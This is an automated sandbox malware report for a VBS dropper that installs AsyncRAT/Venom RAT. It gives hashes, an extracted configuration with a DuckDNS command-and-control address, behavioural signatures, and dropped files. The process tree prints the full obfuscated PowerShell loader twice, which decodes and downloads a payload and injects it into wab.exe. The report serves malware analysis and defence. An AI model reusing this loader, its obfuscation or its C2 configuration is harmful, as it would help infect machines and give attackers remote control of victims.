Overview

overview

10

Static

static

1

255c4ecba9...f6.vbs

windows7-x64

10

255c4ecba9...f6.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-05-2024 13:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6.vbs

  • Size

    897KB

  • MD5

    c983e816294b2d4c2213db5bc4339393

  • SHA1

    4eb96d15af10865ac93ed29ec475bb8eafe91ea3

  • SHA256

    255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6

  • SHA512

    fac24fd9947e732069c7a3fdcb91376ace629ace66b1e0f9fb384b9ca03725c7f39b8f817c4bea4593595f30ebb67083fbafaebe61bfc59a3176caddf3aeaecb

  • SSDEEP

    12288:qzTzUyR7hSRac+qkLmttaGgMskgqoiMHsp90:UXh+k+taGKqoJO0

Score
10/10
asyncratvenom clientsrat

Malware Config

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

C2

xvern429.duckdns.org:8890

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Blocklisted process makes network request 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3492
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks ';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu Okker/RepeocPligt Stors$A.aniKUnsilo aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2628
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"
        3⤵
          PID:3872
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks ';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu Okker/RepeocPligt Stors$A.aniKUnsilo aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4156
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"
            4⤵
              PID:432
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of AdjustPrivilegeToken
              PID:2608

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_owbo2hwy.0hv.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Absterge.Pig
        Filesize

        431KB

        MD5

        ce1f757dad7e08f32964a255a380674e

        SHA1

        19e38ec002272355856d0f68324c0b18a7a07dc0

        SHA256

        4e0fe5353ac7e82175ab48a53995198157b546bb2eec91ee1d7d63432b710548

        SHA512

        ad6b88260234a1abf893680f0332510cd08f9192b6e76478c962203617e689b9cf538f7b2aa44422493d4a80b872a24bcf4258e17a540eaf901a59f37933707e

        Download Submit

      • memory/2608-68-0x0000000020600000-0x000000002069C000-memory.dmp

        Filesize

        624KB

        Download

      • memory/2608-63-0x0000000000C70000-0x0000000001EC4000-memory.dmp

        Filesize

        18.3MB

        Download

      • memory/2608-64-0x0000000000C70000-0x0000000000C86000-memory.dmp

        Filesize

        88KB

        Download

      • memory/2628-6-0x000001DCB8A80000-0x000001DCB8AA2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2628-11-0x00007FFC48D00000-0x00007FFC497C1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2628-12-0x00007FFC48D00000-0x00007FFC497C1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2628-0-0x00007FFC48D03000-0x00007FFC48D05000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2628-67-0x00007FFC48D00000-0x00007FFC497C1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2628-46-0x00007FFC48D03000-0x00007FFC48D05000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2628-45-0x00007FFC48D00000-0x00007FFC497C1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4156-22-0x0000000004D30000-0x0000000005358000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/4156-44-0x00000000085B0000-0x00000000094D9000-memory.dmp

        Filesize

        15.2MB

        Download

      • memory/4156-39-0x0000000006120000-0x000000000613A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/4156-40-0x0000000006EA0000-0x0000000006F36000-memory.dmp

        Filesize

        600KB

        Download

      • memory/4156-41-0x0000000006E00000-0x0000000006E22000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4156-42-0x0000000008000000-0x00000000085A4000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/4156-37-0x0000000005BD0000-0x0000000005C1C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/4156-38-0x00000000073D0000-0x0000000007A4A000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/4156-36-0x0000000005B90000-0x0000000005BAE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/4156-35-0x00000000055E0000-0x0000000005934000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/4156-24-0x00000000053D0000-0x0000000005436000-memory.dmp

        Filesize

        408KB

        Download

      • memory/4156-25-0x0000000005570000-0x00000000055D6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/4156-23-0x0000000004CE0000-0x0000000004D02000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4156-21-0x0000000002290000-0x00000000022C6000-memory.dmp

        Filesize

        216KB

        Download